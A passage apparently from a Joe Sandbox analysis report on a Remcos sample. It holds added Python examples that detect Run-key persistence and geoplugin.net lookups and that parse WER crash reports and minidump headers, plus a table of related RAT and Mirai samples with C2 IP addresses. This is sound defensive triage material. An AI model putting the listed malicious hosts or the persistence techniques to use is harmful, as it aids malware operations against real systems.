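    for line in export.splitlines():
        line = line.strip()
        if not line or "REG_SZ" not in line:
            continue  # hive/key header line or blank
        name, _type, data = [p.strip() for p in re.split(r"\s{2,}", line, maxsplit=2)]
        entries.append((name, data))
    return entries


def scan_run_keys(export):
    """Flag Run values whose name matches the Rmc-<id> pattern or whose target lives in AppData\\Roaming."""
    findings = []
    for name, data in parse_run_entries(export):
        if RMC_VALUE_NAME.match(name):
            findings.append(Finding("run_key", "remcos_style_value_name", f"{name} -> {data}"))
        if ROAMING_PATH.search(data):
            findings.append(Finding("run_key", "autostart_from_appdata_roaming", f"{name} -> {data}"))
    return findings


def geoplugin_clients(log):
    """Return the set of client IPs that fetched the geoplugin.net geolocation endpoint."""
    clients = set()
    for line in log.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue  # blank or malformed line
        client, _method, url, _status = parts
        if GEOPLUGIN_ENDPOINT in url:
            clients.add(client)
    return clients


if __name__ == "__main__":
    for f in scan_run_keys(RUN_KEY_EXPORT):
        print(f"[{f.source}] {f.indicator}: {f.detail}")
    print("hosts that queried geoplugin.net/json.gp:", sorted(geoplugin_clients(PROXY_LOG)))
```

The geoplugin.net hit is a pivot, not a verdict: it is a public geolocation API that legitimate software also calls, so a host that appears in `geoplugin_clients` should be cross-checked against the Run-key findings (or other host telemetry) before being treated as a Remcos infection. The Run-key check, by contrast, fires on two independent properties of the same entry, which is why the constructed export above yields two findings for one value.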
Match | Associated Sample Name / URL | Detection | Threat Name | Context
COMBAHTONcombahtonGmbH (DE)
  iGhDjzEiDU.exe | malicious | Remcos | 185.234.72.215
  b1593574e46fb1f30b1da4fa594f43bb52b051a616db3.exe | malicious | XenoRAT | 194.59.30.69
  Syncing.exe | malicious | AsyncRAT | 185.223.30.86
  l4.exe | malicious | Unknown | 194.59.30.220
  l4.exe | malicious | Unknown | 194.59.30.220
  client.exe | malicious | Unknown | 194.59.30.220
  client.exe | malicious | Unknown | 194.59.30.220
  Shipping Bill No6239999Dt09122024.PDF.jar | malicious | Caesium Obfuscator, STRRAT | 194.59.30.164
  Shipping Bill No6239999Dt09122024.PDF.jar | malicious | Caesium Obfuscator, STRRAT | 194.59.30.164
  Shipping Bill6239999 dated 13122024.PDF.jar | malicious | Caesium Obfuscator, STRRAT | 194.59.30.164
MICROSOFT-CORP-MSN-AS-BLOCK (US)
  fuckunix.sh4.elf | malicious | Mirai | 20.207.85.197
  fuckunix.mips.elf | malicious | Mirai | 52.241.5.221
  Fantazy.i486.elf | malicious | Unknown | 20.82.228.36
  Fantazy.sh4.elf | malicious | Unknown | 40.113.111.211
  Fantazy.mips.elf | malicious | Unknown | 20.53.37.124
  Fantazy.x86.elf | malicious | Unknown | 20.113.156.73
  Fantazy.mpsl.elf | malicious | Unknown | -
                                                                                                                                                                                            • 20.92.77.27
                                                                                                                                                                                            iGhDjzEiDU.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                            • 13.107.246.67
                                                                                                                                                                                            4.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                            • 157.55.8.211
                                                                                                                                                                                            31.13.224.14-x86-2025-01-03T22_14_18.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                            • 20.85.193.111
                                                                                                                                                                                            ATOM86-ASATOM86NLiGhDjzEiDU.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                            • 178.237.33.50
                                                                                                                                                                                            1.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                            • 178.237.33.50
                                                                                                                                                                                            Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                            • 178.237.33.50
                                                                                                                                                                                            heteronymous.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                            • 178.237.33.50
                                                                                                                                                                                            2LDJIyMl2r.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                            • 178.237.33.50
                                                                                                                                                                                            1evAkYZpwDV0N4v.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                            • 178.237.33.50
                                                                                                                                                                                            94e.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                            • 178.237.33.50
                                                                                                                                                                                            94e.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                            • 178.237.33.50
                                                                                                                                                                                            0442.pdf.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                            • 178.237.33.50
                                                                                                                                                                                            1734707047fff7a4a195c1e77157873964de3a3a708aa4bdc0aee24f3a94bc5bd05cc323f3964.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                            • 178.237.33.50
                                                                                                                                                                                            No context
                                                                                                                                                                                            No context
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 65536
Entropy (8bit): 1.2455535779926308
Encrypted: false
SSDEEP: 192:9O/kiA0BU/qaOOJoNZrMSCdzuiFcEZ24IO8X:Y/kuBU/qaJSmzuiFcEY4IO8X
MD5: CCEBF85FE19FE46ED1F5893573E6CB4A
SHA1: A7EA56BE2A44C4A55505BD23D596C8D09513D3FA
SHA-256: D61D33D3024C67E11629030CC6C1989371AC5EAE93309B9F29E073E4E06453D2
SHA-512: 0EE7D532DE3C0468C6D547FACE6EE831A3469D3600DAA7DF0029AE708D8E9315D510A6414B4E1A9986EA402DB7767464CDE0FCDAC93764DBEFDF83FFBF26DBDC
Malicious: true
                                                                                                                                                                                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.0.4.8.6.1.1.3.5.2.6.2.0.3.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.0.4.8.6.1.1.5.7.4.4.9.5.1.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.4.4.3.3.8.2.7.-.f.e.d.0.-.4.b.4.5.-.a.9.1.b.-.c.0.5.d.b.b.2.3.7.0.f.e.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.0.0.2.1.b.e.d.-.c.1.1.b.-.4.9.1.c.-.9.f.d.0.-.0.e.9.f.9.e.7.0.0.3.e.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.4.X.Y.A.W.8.P.b.Z.H...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.t.Y.f.l...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.4.0.-.0.0.0.1.-.0.0.1.4.-.c.9.e.3.-.8.c.e.f.c.f.5.e.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.a.5.3.a.b.0.7.8.a.6.d.b.a.6.7.3.f.7.f.d.4.4.2.e.8.4.2.7.c.4.e.b.0.0.0.0.0.0.0.0.!.0.0.0.0.9.a.a.5.3.8.0.d.c.8.7.8.2.9.c.6.f.a.2.2.e.9.0.2.9.c.a.d.c.a.b.9.f.6.2.2.1.e.f.9.

Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 65536
Entropy (8bit): 1.2445990089136223
Encrypted: false
SSDEEP: 192:wPrALohOA0BU/6aGuJoNZrMSCdzuiFcEZ24IO8O:LchCBU/6aBSmzuiFcEY4IO8O
MD5: FC416533FC285E770BB329C167EDA0A9
SHA1: 4F980936B8872B3C20EAD3E61A9B9951C8E8AD45
SHA-256: 37A34027704D74D2FC1462C0F19AA91876C5FEFC79868805EE8D8C78E007F098
SHA-512: 5A99C0A4251FB67780CFFE6831E4E50C2A5DF275EB8BF519D0B910C8027E2F5B922F384AD7030104EDF9464534FA5C1446EB01C517CC4F18BE0A5F376F2BC1BA
Malicious: false
                                                                                                                                                                                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.0.4.8.6.1.1.7.0.1.6.4.6.0.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.0.4.8.6.1.1.8.5.1.6.4.4.8.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.4.e.c.3.d.e.c.-.2.4.a.a.-.4.6.c.3.-.9.0.1.9.-.a.b.8.b.6.1.d.6.1.b.3.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.0.d.3.a.e.7.1.-.e.b.b.d.-.4.6.1.a.-.8.2.9.2.-.2.9.b.d.0.7.e.e.3.9.e.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.g.r.a.i.a.s...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.t.Y.f.l...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.c.1.4.-.0.0.0.1.-.0.0.1.4.-.8.4.8.8.-.5.9.f.1.c.f.5.e.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.a.5.3.a.b.0.7.8.a.6.d.b.a.6.7.3.f.7.f.d.4.4.2.e.8.4.2.7.c.4.e.b.0.0.0.0.0.0.0.0.!.0.0.0.0.9.a.a.5.3.8.0.d.c.8.7.8.2.9.c.6.f.a.2.2.e.9.0.2.9.c.a.d.c.a.b.9.f.6.2.2.1.e.f.9.!.g.r.a.
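The two 64 KiB UTF-16 files above have the layout of Windows Error Reporting's Report.wer: a BOM, then one CRLF-terminated Key=Value pair per line (the dots in the previews are the NUL high bytes and the CR/LF bytes). That identification is mine, as is the following example; it is not part of the Joe Sandbox report. It decodes such a file and pulls out the fields an analyst pivots on: the crashing process name, the PE's original filename, the event type, the host/guest architecture pair and the digest embedded in TargetAppId. SAMPLE_WER is constructed from the values visible in the second preview; the TargetAppId tail after the second `!` is cut off in the preview, so `graias.exe` there is an assumption.

```python
"""Decode a Windows Error Reporting Report.wer file and summarise it for triage.

Added example, not part of the Joe Sandbox report. SAMPLE_WER is constructed
from the values visible in the second Report.wer preview; it is not the
dropped file itself.
"""
import re
from datetime import datetime, timedelta, timezone

# Constructed input. WER writes Report.wer as UTF-16LE with a BOM and one
# CRLF-terminated Key=Value pair per line. The "!graias.exe" tail of
# TargetAppId is assumed (the preview is cut off after "!gra").
SAMPLE_WER = b"\xff\xfe" + "\r\n".join([
    "Version=1",
    "EventType=CLR20r3",
    "EventTime=133804861170164609",
    "ReportType=2",
    "Consent=1",
    "UploadTime=133804861185164481",
    "ReportStatus=524384",
    "ReportIdentifier=e4ec3dec-24aa-46c3-9019-ab8b61d61b30",
    "Wow64Host=34404",
    "Wow64Guest=332",
    "NsAppName=graias.exe",
    "OriginalFilename=tYfl.exe",
    "TargetAppId=W:0006a53ab078a6dba673f7fd442e8427c4eb00000000"
    "!00009aa5380dc87829c6fa22e9029cadcab9f6221ef9!graias.exe",
    "",
]).encode("utf-16-le")

# IMAGE_FILE_MACHINE_* values as they appear in Wow64Host / Wow64Guest.
MACHINE = {0x014C: "x86", 0x8664: "x64", 0xAA64: "ARM64"}

# WER event types met most often; CLR20r3 is the one in this report.
EVENT_TYPES = {
    "CLR20r3": "unhandled .NET exception",
    "APPCRASH": "native unhandled exception",
    "BEX": "native buffer-overrun / DEP fault",
}

FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def filetime_to_datetime(ticks: str) -> datetime:
    """Convert a FILETIME (100 ns ticks since 1601-01-01 UTC) to an aware datetime."""
    return FILETIME_EPOCH + timedelta(microseconds=int(ticks) // 10)


def parse_wer(data: bytes) -> dict:
    """Decode a Report.wer blob into a Key -> Value dict (insertion ordered)."""
    if data.startswith(b"\xff\xfe"):      # strip the UTF-16LE BOM
        data = data[2:]
    fields = {}
    for line in data.decode("utf-16-le").splitlines():
        key, sep, value = line.partition("=")
        if sep:
            fields[key.strip()] = value
    return fields


def triage(fields: dict) -> dict:
    """Pull out the fields an analyst pivots on."""
    # TargetAppId carries a 40-hex-digit digest of the crashing image after
    # "!0000"; it can be matched against the SHA1 of the submitted sample.
    digest = re.search(r"!0000([0-9A-Fa-f]{40})", fields.get("TargetAppId", ""))
    event_type = fields.get("EventType")
    return {
        "process": fields.get("NsAppName"),
        "original_filename": fields.get("OriginalFilename"),
        "event": EVENT_TYPES.get(event_type, event_type),
        "host_arch": MACHINE.get(int(fields.get("Wow64Host", "0"))),
        "guest_arch": MACHINE.get(int(fields.get("Wow64Guest", "0"))),
        "event_time_utc": filetime_to_datetime(fields["EventTime"]).isoformat(),
        "image_sha1": digest.group(1).lower() if digest else None,
    }


if __name__ == "__main__":
    for key, value in triage(parse_wer(SAMPLE_WER)).items():
        print(f"{key:18} {value}")
```

On the sample data this yields a 32-bit (Wow64Guest=332) .NET process crashing on an x64 host at 2025-01-04 17:41:57 UTC, three seconds after the first report's EventTime, which lines up with the timestamps `file` prints for the two minidumps below. The NsAppName/OriginalFilename pair is the useful part: the process that crashed was running under a different name than the PE's own version-resource filename.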

Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Mini DuMP crash report, 15 streams, Sat Jan 4 17:41:54 2025, 0x1205a4 type
Category: dropped
Size (bytes): 334044
Entropy (8bit): 3.8616172341243127
Encrypted: false
SSDEEP: 3072:OIouSHc4uEqBy/nmLTgcjSO4X4GY6C28pFVNS:OESHc4AyfkTgp228r
MD5: 9D2A395110EF5EBE512B59469A135BAE
SHA1: D615B6DC51EA00A89194AEFE9A5853537E0D3E01
SHA-256: 8620107942EECAD255EEF7E5AEBF77CFCF4CA5C5B930BDD0D8B654EAB9E69F29
SHA-512: 13630D58BD11DDAB26F3EEA66347D8BB08B1DA0E6540A1289EDE4B716D14F83E790983CD060032F7265D89EF5A6284F634DB72B7F7284396BCC5AC9CC4BF24BA
Malicious: false
                                                                                                                                                                                            Preview:MDMP..a..... ........ryg........................0"..........$....,......d/...e..........`.......8...........T............B..............<,..........(...............................................................................eJ..............GenuineIntel............T.......@....ryg.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

Process: C:\Windows\SysWOW64\WerFault.exe
File Type: XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 8410
Entropy (8bit): 3.701231701297229
Encrypted: false
SSDEEP: 192:R6l7wVeJEnR6E6Y93SU9xXgmfZlCprK89bQ/sfEwm:R6lXJC6E6YNSU9xXgmfbcQkfC
MD5: 2538A9EF815A757F99BF867388D226F9
SHA1: C4E380138896AFF3CB2C7077B768C2C3FCAE5096
SHA-256: 9F340E9DC56EB7B987212458B4814E7555DF41C411BC86DA87A9DFEE1444904F
SHA-512: D82959B3908790441584E247D8383BC827B39C96E4BC7E475E8EE2F7DF71719DC91CD4A0432480C2624D06A18B3EF42A346B8831D3A9312718AA8E06D9A90443
Malicious: false
                                                                                                                                                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.9.7.6.<./.P.i.

Process: C:\Windows\SysWOW64\WerFault.exe
File Type: XML 1.0 document, ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 4741
Entropy (8bit): 4.475061324098097
Encrypted: false
SSDEEP: 48:cvIwWl8zsfJg77aI93xDCWpW8VYfYm8M4JAK46F64H+q8vDK4z3DZfJd:uIjfBI7pxDD7VbJ24HKl3VfJd
MD5: 6A2BA31E5E776D9AC550C1B508B99712
SHA1: 45A78BF593EB946A0D12CDFC404B1850B9DAC2C2
SHA-256: 1ABFBFD39AE83E1AB25E170D833F5CD110106433BEE387E02EB89068F6A47A13
SHA-512: D9CE67E4AFD6FD1FC6F609EA0C864FC357C8232F0A2D9A4354492DB5C16B957C919C764CABDDF7433EC0A887545F423A96369A73A6E405D30C5BA41C72EF6488
Malicious: false
                                                                                                                                                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="661484" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Mini DuMP crash report, 15 streams, Sat Jan 4 17:41:57 2025, 0x1205a4 type
Category: dropped
Size (bytes): 335758
Entropy (8bit): 3.9073969862679863
Encrypted: false
SSDEEP: 3072:z9iZIQOSiGasc4uEq7yPLTgTYP0omcgvyMN1ooxiCISThM:zgZI+iGasc4+yjTgrv5VxN
MD5: DBC101C38F26AC2D3CBA67065BD7B769
SHA1: FB3DD2AE55EC3FC6B493612B96A76EE2D7E4B286
SHA-256: 826268E4FADCF94E9E0C53EE1580A007F7DA34661F8321939E67C92AA1F39BEC
SHA-512: 2E00D26C52DE74700A1D932E453532E13A489B7C3518AAC320E78CE434A72CB892D0D83340A036A017296FC6EF3B0FB417CB16CBC31C7C3BA2F2D575FF8DC041
Malicious: false
                                                                                                                                                                                            Preview:MDMP..a..... ........ryg........................0"..........$....,......./...e..........`.......8...........T...........xB..............<,..........(...............................................................................eJ..............GenuineIntel............T............ryg.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
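The two "Mini DuMP crash report" entries are the WER minidumps written for the two crashes. The stream count, the timestamp and the `0x1205a4 type` in their File Type lines are all read from the 32-byte MINIDUMP_HEADER at the start of the file, which is what the preview's `MDMP..a..... ........ryg` shows (the `ryg` are three bytes of the little-endian TimeDateStamp 0x677972e2, and the following eight non-printable bytes are the Flags field). The example below is mine, not anything from the Joe Sandbox report; it parses that header and expands the MINIDUMP_TYPE flags so you can tell what the dump contains before opening it. SAMPLE_HEADER is constructed to carry the first entry's values (15 streams, 2025-01-04 17:41:54 UTC, flags 0x1205a4); the high word of its Version field is an assumed value, and the checksum is set to zero.

```python
"""Parse the MINIDUMP_HEADER of a crash dump and decode its MINIDUMP_TYPE flags.

Added example, not part of the Joe Sandbox report. SAMPLE_HEADER is constructed
to match the first minidump entry; it is not the dropped file.
"""
import struct
from datetime import datetime, timezone

MINIDUMP_SIGNATURE = 0x504D444D   # the bytes b"MDMP" read as a little-endian DWORD
MINIDUMP_VERSION = 0xA793         # low 16 bits of Version; the high 16 are implementation-defined

# MINIDUMP_TYPE bit flags, from minidumpapiset.h.
MINIDUMP_TYPE = {
    0x00000001: "WithDataSegs",
    0x00000002: "WithFullMemory",
    0x00000004: "WithHandleData",
    0x00000008: "FilterMemory",
    0x00000010: "ScanMemory",
    0x00000020: "WithUnloadedModules",
    0x00000040: "WithIndirectlyReferencedMemory",
    0x00000080: "FilterModulePaths",
    0x00000100: "WithProcessThreadData",
    0x00000200: "WithPrivateReadWriteMemory",
    0x00000400: "WithoutOptionalData",
    0x00000800: "WithFullMemoryInfo",
    0x00001000: "WithThreadInfo",
    0x00002000: "WithCodeSegs",
    0x00004000: "WithoutAuxiliaryState",
    0x00008000: "WithFullAuxiliaryState",
    0x00010000: "WithPrivateWriteCopyMemory",
    0x00020000: "IgnoreInaccessibleMemory",
    0x00040000: "WithTokenInformation",
    0x00080000: "WithModuleHeaders",
    0x00100000: "FilterTriage",
    0x00200000: "WithAvxXStateContext",
    0x00400000: "WithIptTrace",
    0x00800000: "ScanInaccessiblePartialPages",
}

# MINIDUMP_HEADER: Signature, Version, NumberOfStreams, StreamDirectoryRva,
# CheckSum, TimeDateStamp (ULONG32, Unix epoch seconds), Flags (ULONG64).
HEADER = struct.Struct("<6IQ")

# Constructed header with the first minidump entry's values. Version's high
# word (0x0061) is assumed from the "a" in the preview; CheckSum is set to 0.
SAMPLE_HEADER = HEADER.pack(
    MINIDUMP_SIGNATURE, 0x0061A793, 15, HEADER.size, 0, 1736012514, 0x1205A4
)


def parse_minidump_header(data: bytes) -> dict:
    """Return the header fields, or raise ValueError if this is not a minidump."""
    if len(data) < HEADER.size:
        raise ValueError("too short for a MINIDUMP_HEADER")
    sig, ver, nstreams, dir_rva, checksum, stamp, flags = HEADER.unpack_from(data)
    if sig != MINIDUMP_SIGNATURE:
        raise ValueError(f"bad signature {sig:#010x}")
    if ver & 0xFFFF != MINIDUMP_VERSION:
        raise ValueError(f"unexpected minidump version {ver & 0xFFFF:#06x}")
    return {
        "streams": nstreams,
        "stream_directory_rva": dir_rva,
        "checksum": checksum,
        "timestamp": datetime.fromtimestamp(stamp, tz=timezone.utc),
        "flags": flags,
        "flag_names": [name for bit, name in sorted(MINIDUMP_TYPE.items()) if flags & bit],
        # Any bit outside the known enum is worth a second look.
        "unknown_flag_bits": flags & ~sum(MINIDUMP_TYPE),
    }


def describe(data: bytes) -> str:
    """One-line summary in the spirit of what file(1) prints, but in UTC."""
    h = parse_minidump_header(data)
    return (f"Mini DuMP crash report, {h['streams']} streams, "
            f"{h['timestamp']:%Y-%m-%d %H:%M:%S} UTC, {h['flags']:#x} type")


if __name__ == "__main__":
    print(describe(SAMPLE_HEADER))
    print(", ".join(parse_minidump_header(SAMPLE_HEADER)["flag_names"]))
```

For 0x1205a4 the decoded flags are WithHandleData, WithUnloadedModules, FilterModulePaths, WithProcessThreadData, WithoutOptionalData, IgnoreInaccessibleMemory and FilterTriage: a WER triage dump, not a full-memory one (WithFullMemory is clear), so the ~330 KB files hold thread contexts, handle and module lists but not the injected payload's private heap. The stream directory at the RVA is where a fuller parser would continue.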
                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):8338
                                                                                                                                                                                            Entropy (8bit):3.687232782228521
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:192:R6l7wVeJwk6qr6Y3D6FnGgmfZxCpra89bLzsfsrZZm:R6lXJj6u6YT6VGgmffcLYfF
                                                                                                                                                                                            MD5:38EFD7118FDAF349D9370AA433548610
                                                                                                                                                                                            SHA1:684DDA6A453AC6D02F9B3FFB8B871FDF5751DB4B
                                                                                                                                                                                            SHA-256:B49581C230F0717B922E2121B9355D16C3076CB24F4F4FDAD98145028B2A4C1D
                                                                                                                                                                                            SHA-512:9AA7D16BA698F856CDF0BB38B5149CA09A2AAF8CDA68E0FC764D15313238BFFBBFBCCCE9B21178546037773A8564D564935D8B3DFD62E54F85D2FDB7C05E1A0C
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.1.8.8.<./.P.i.
                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):4721
                                                                                                                                                                                            Entropy (8bit):4.430900339297858
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:48:cvIwWl8zsfJg77aI93xDCWpW8VY/Ym8M4J0ZcKK46F5+q8vQKK4wDVtOGtvd:uIjfBI7pxDD7VHJ0cKAPOkvd
                                                                                                                                                                                            MD5:41DF37246136B0FF9566C41E2639B826
                                                                                                                                                                                            SHA1:98FCCBD67A14826B60E6D56EECA7B00BF1C284E2
                                                                                                                                                                                            SHA-256:FA8F676BFFAEC2FC441BCDD716E131922244FDC99BE3EB8B16B5B44D7F40F62D
                                                                                                                                                                                            SHA-512:0CBDBD5F13D976B466FD5C975007F07580B3A7277A94B3A992630158BFFC32095C4140EC8ED16746CEC20DCC97C87B34F158DADB3A6240F8797CEAE2FAC26DA2
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="661484" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\Graias\graias.exe
                                                                                                                                                                                            File Type:data
